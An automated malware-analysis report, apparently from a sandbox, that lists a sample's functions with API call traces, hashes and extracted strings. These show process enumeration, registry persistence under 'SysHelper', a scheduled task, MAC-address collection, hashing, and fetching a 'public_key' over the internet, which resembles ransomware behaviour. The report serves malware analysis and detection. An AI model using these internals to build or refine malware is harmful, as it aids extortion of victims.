                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00481EDD
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00481F03
                                                                                                                                                                                                      • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 00481F1A
                                                                                                                                                                                                      • Heap32First.KERNEL32(00000024,?,?), ref: 00481F95
                                                                                                                                                                                                      • Heap32Next.KERNEL32(?,?,?,?,?,B1EBD2B0), ref: 00481FE3
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00481FF1
                                                                                                                                                                                                      • Heap32ListNext.KERNEL32(?,?), ref: 00482058
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00482066
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00482095
                                                                                                                                                                                                      • Process32First.KERNEL32(?,00000128), ref: 004820AA
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004820FB
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00482118
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00482187
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004821A4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
                                                                                                                                                                                                      • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                                                                                                                      • API String ID: 4174345323-1723836103
                                                                                                                                                                                                      • Opcode ID: 7892fcb137716207a1425ae7febf787ac69884024082663a250f7990229244b5
                                                                                                                                                                                                      • Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7892fcb137716207a1425ae7febf787ac69884024082663a250f7990229244b5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041E690, Relevance: 110.9, APIs: 54, Strings: 9, Instructions: 696stringnetworkfileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • timeGetTime.WINMM ref: 0041E6C0
                                                                                                                                                                                                        • Part of subcall function 0040C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0041E6D4), ref: 0040C6C2
                                                                                                                                                                                                        • Part of subcall function 0040C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                                                                                                                                        • Part of subcall function 0040C6A0: RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0041E707
                                                                                                                                                                                                        • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
                                                                                                                                                                                                      • InternetOpenW.WININET ref: 0041E743
                                                                                                                                                                                                      • _wcsstr.LIBCMT ref: 0041E7AE
                                                                                                                                                                                                      • _memmove.LIBCMT ref: 0041E838
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 0041E90A
                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                                                                                                                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                                                                                                                                                                                      • _strstr.LIBCMT ref: 0041EA36
                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                                                                                                                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                                                                                                                                                                                      • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 0041EB5B
                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0041EB86
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0041EB94
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 0041EBB6
                                                                                                                                                                                                      • _strstr.LIBCMT ref: 0041EBDA
                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                                                                                                                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0041EC3E
                                                                                                                                                                                                      • lstrlenA.KERNEL32(","id":"), ref: 0041EC51
                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041EC6D
                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041EC7F
                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0041EC93
                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000022), ref: 0041ECB3
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 0041ED2A
                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0041ED4B
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0041ED55
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0041ED63
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 0041ED7D
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 0041ED85
                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0041EDA3
                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0041EDAE
                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EDD3
                                                                                                                                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EDF7
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0041EE05
                                                                                                                                                                                                      • _free.LIBCMT ref: 0041EE15
                                                                                                                                                                                                      • _free.LIBCMT ref: 0041EE22
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 0041EF61
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 0041EFBF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                                                                                                                      • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                                                                                                                      • API String ID: 704684250-3586605218
                                                                                                                                                                                                      • Opcode ID: db1174924a51d8230cc5c9ba5bc106665cecdbaed52d9ba56177db6f9d1cb603
                                                                                                                                                                                                      • Instruction ID: 6dbc96f3ccd93c00a013485041b5c7257b0a9ae09bebbc57280f72cccf7ce4d8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: db1174924a51d8230cc5c9ba5bc106665cecdbaed52d9ba56177db6f9d1cb603
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA421771508341ABD720DF25DC45BDB7BE8BF85308F44092EF88587292DB78E589CB9A
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040D240, Relevance: 58.5, APIs: 25, Strings: 8, Instructions: 702comCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0040D26C
                                                                                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                                                                                                                                                                                                      • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0040D2F0
                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0040D309
                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0040D322
                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0040D33B
                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0040D397
                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0040D3A4
                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0040D3B1
                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0040D3C2
                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 0040D3D5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                                                                                                                      • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                                                                                                                      • API String ID: 2496729271-1738591096
                                                                                                                                                                                                      • Opcode ID: 8a2de3b4e8edfc4458d05c7407b8d359bd2b27e39876b0d8627c1435ad35d818
                                                                                                                                                                                                      • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a2de3b4e8edfc4458d05c7407b8d359bd2b27e39876b0d8627c1435ad35d818
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00410FC0, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00411026
                                                                                                                                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                                                                                                                                                                                                      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00411051
                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                                                                                                                                                                                      • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0041107A
                                                                                                                                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004110AB
                                                                                                                                                                                                      • _memset.LIBCMT ref: 004110CA
                                                                                                                                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004110F0
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00411100
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0041110B
                                                                                                                                                                                                      • _sprintf.LIBCMT ref: 0041112E
                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                                                                                                                                                                                      • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                                                                                                                                                                                      • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                                                                                                                      • String ID: %.2X
                                                                                                                                                                                                      • API String ID: 2451520719-213608013
                                                                                                                                                                                                      • Opcode ID: cffbae393b9c2034aaa015718cd028ffd9aba4d39295b0a39f2b934ffbce0a78
                                                                                                                                                                                                      • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cffbae393b9c2034aaa015718cd028ffd9aba4d39295b0a39f2b934ffbce0a78
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040F730, Relevance: 29.2, APIs: 19, Instructions: 732COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
                                                                                                                                                                                                        • Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
                                                                                                                                                                                                        • Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE
                                                                                                                                                                                                      • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 0040F900
                                                                                                                                                                                                      • _memmove.LIBCMT ref: 0040F9EA
                                                                                                                                                                                                      • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                                                                                                                                                                                                      • _memmove.LIBCMT ref: 0040FADA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 273148273-0
                                                                                                                                                                                                      • Opcode ID: 80b505e3e9de462384f30ce35ee2d78f83d4a9e3039c128a2f956e14ebc7fabc
                                                                                                                                                                                                      • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80b505e3e9de462384f30ce35ee2d78f83d4a9e3039c128a2f956e14ebc7fabc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040E870, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                                                                                                                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                                                                                                                                                                                                      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                                                                                                                                                                                      • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                                                                                                                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040E98E
                                                                                                                                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                                                                                                                                                                                      • _sprintf.LIBCMT ref: 0040E9D3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                                                                                                                      • String ID: %.2X
                                                                                                                                                                                                      • API String ID: 1084002244-213608013
                                                                                                                                                                                                      • Opcode ID: bc413ef1927ad5c7ad4c63796ca5ebcd4ef3e5a2d970d576ee0f7f2f19d63589
                                                                                                                                                                                                      • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc413ef1927ad5c7ad4c63796ca5ebcd4ef3e5a2d970d576ee0f7f2f19d63589
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040EAA0, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000,00000000,?), ref: 0040EB01
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                                                                                                                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                                                                                                                                                                                                      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                                                                                                                                                                                      • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0040EB4E
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                                                                                                                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040EB83
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040EBB4
                                                                                                                                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                                                                                                                                                                                      • _sprintf.LIBCMT ref: 0040EBF4
                                                                                                                                                                                                      • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                                                                                                                                                                                      • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                                                                                                                      • String ID: %.2X
                                                                                                                                                                                                      • API String ID: 1637485200-213608013
                                                                                                                                                                                                      • Opcode ID: 3c969f350820ba706d19a7227015f75167d650bfbf9457a4931adb697a62dd31
                                                                                                                                                                                                      • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c969f350820ba706d19a7227015f75167d650bfbf9457a4931adb697a62dd31
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040E670, Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0040E67F
                                                                                                                                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00820000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0040E68B
                                                                                                                                                                                                      • _wprintf.LIBCMT ref: 0040E69E
                                                                                                                                                                                                      • _free.LIBCMT ref: 0040E6A4
                                                                                                                                                                                                        • Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C01
                                                                                                                                                                                                        • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C13
                                                                                                                                                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                                                                                                                                                                                      • _free.LIBCMT ref: 0040E6C5
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0040E6CD
                                                                                                                                                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                                                                                                                                                                                      • _sprintf.LIBCMT ref: 0040E720
                                                                                                                                                                                                      • _wprintf.LIBCMT ref: 0040E732
                                                                                                                                                                                                      • _wprintf.LIBCMT ref: 0040E73C
                                                                                                                                                                                                      • _free.LIBCMT ref: 0040E745
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                                                                                                                                                                                      • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                                                                                                                                                                                      • Address: %s, mac: %s, xrefs: 0040E72D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                                                                                                                      • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                                                                                                                      • API String ID: 3901070236-1604013687
                                                                                                                                                                                                      • Opcode ID: a328fcd4842b127b9f08d968f541d4271d964a2002a9895a22376d6d76895778
                                                                                                                                                                                                      • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a328fcd4842b127b9f08d968f541d4271d964a2002a9895a22376d6d76895778
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00411CD0, Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
